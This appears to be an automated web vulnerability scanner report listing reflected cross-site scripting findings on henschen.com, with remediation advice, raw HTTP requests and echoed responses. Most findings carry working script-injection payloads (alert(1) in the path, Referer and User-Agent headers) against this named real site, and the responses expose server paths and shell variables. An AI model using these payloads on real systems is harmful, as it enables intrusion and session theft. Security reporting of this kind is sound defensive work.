CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')in henschen.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://henschen.com/index.php [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a811d--><script>alert(1)</script>9b687f71d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php/a811d--><script>alert(1)</script>9b687f71d8a HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:39:50 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616564
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6424

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
<script>alert(1)</script>9b687f71d8a";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/
...[SNIP]...

1.2. http://henschen.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 48643--><script>alert(1)</script>61f3786d0dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=48643--><script>alert(1)</script>61f3786d0dc

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:37:53 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616447
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6460

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
<script>alert(1)</script>61f3786d0dc";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.3. http://henschen.com/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload f660a--><script>alert(1)</script>d8dd859a545 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f660a--><script>alert(1)</script>d8dd859a545
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:37:52 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616446
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
PFTERM=ansi;FILEPATH="/index.php";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f660a--><script>alert(1)</script>d8dd859a545";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/6v59YgR0S9ett2c7Vozivu3emk4nP3J2.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.4. http://henschen.com/index.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f28f7--><script>alert(1)</script>da51b7da7e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f28f7--><script>alert(1)</script>da51b7da7e

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:39:55 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616569
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
<script>alert(1)</script>da51b7da7e";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.5. http://henschen.com/index.php [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 44570--><script>alert(1)</script>a6bd0f4739d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1644570--><script>alert(1)</script>a6bd0f4739d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:39:53 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616567
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
PFTERM=ansi;FILEPATH="/index.php";REFERER="";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1644570--><script>alert(1)</script>a6bd0f4739d";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/UTWBB4k77z571W1CnHk5U2E49xbB9E7v.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.6. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deab9</script><script>alert(1)</script>e4072587b4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=deab9</script><script>alert(1)</script>e4072587b4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:28 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616722
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-fp.gif";REFERER="http://www.google.com/search?hl=en&q=deab9</script><script>alert(1)</script>e4072587b4b";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.7. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15563</script><script>alert(1)</script>b23a4b6fb5f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-fp.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1615563</script><script>alert(1)</script>b23a4b6fb5f
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:21 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616715
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1615563</script><script>alert(1)</script>b23a4b6fb5f";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/22pjhdbB0A9TX5eflVHFvvwn8uY5LKR1.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.8. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a627d</script><script>alert(1)</script>a41d97b7523 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a627d</script><script>alert(1)</script>a41d97b7523
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:26 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616720
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-mm.gif";REFERER="http://www.google.com/search?hl=en&q=a627d</script><script>alert(1)</script>a41d97b7523";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.9. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95abe</script><script>alert(1)</script>a167137736c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-mm.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1695abe</script><script>alert(1)</script>a167137736c
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:22 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616716
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1695abe</script><script>alert(1)</script>a167137736c";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/okm2GDJDIbRVR50J0CYVrsN2e8ru2mYn.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.10. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996c4</script><script>alert(1)</script>fd72dde3a3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=996c4</script><script>alert(1)</script>fd72dde3a3c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:23 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616717
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
</gif/ar-oki.gif";REFERER="http://www.google.com/search?hl=en&q=996c4</script><script>alert(1)</script>fd72dde3a3c";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/
...[SNIP]...

1.11. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5343</script><script>alert(1)</script>4f6fbdc01c6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-oki.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16c5343</script><script>alert(1)</script>4f6fbdc01c6
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 17:42:20 GMT
Server: Apache/1.3.26
Cache-Control: max-age=-616714
Expires: Tue, 19 Apr 2011 14:23:46 GMT
X-Powered-By: PHP/4.2.0
Content-Type: text/html
Content-Length: 6570

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Henschen & Associates, Inc., - Government Software Specialists</title>
<meta http-
...[SNIP]...
3Ealert(%22DORK%22)%3C/script%3E9b687f71d8a";USERADDR="173.193.214.243";BROWSER="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16c5343</script><script>alert(1)</script>4f6fbdc01c6";EXTINFO="";OUTFILE="/Internet/Apache/Tmp/ospnNzgR5v3g80Hb5QoBOzbiWby2R4k4.pc.trf"; export PFDIR PFTERM FILEPATH REFERER USERADDR BROWSER EXTINFO OUTFILE;/appl/fp/Wdreport wscontrol -f web.post_page_h
...[SNIP]...

1.12. http://henschen.com/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://henschen.com
Path:	/index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8688</script><script>alert(1)</script>3e6a23b5830 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /index.php/a811d--%3E%3Cscript%3Ealert(%22DORK%22)%3C/gif/ar-sco.gif HTTP/1.1
Host: henschen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c8688</script><script>alert(1)</script>3e6a23b5830
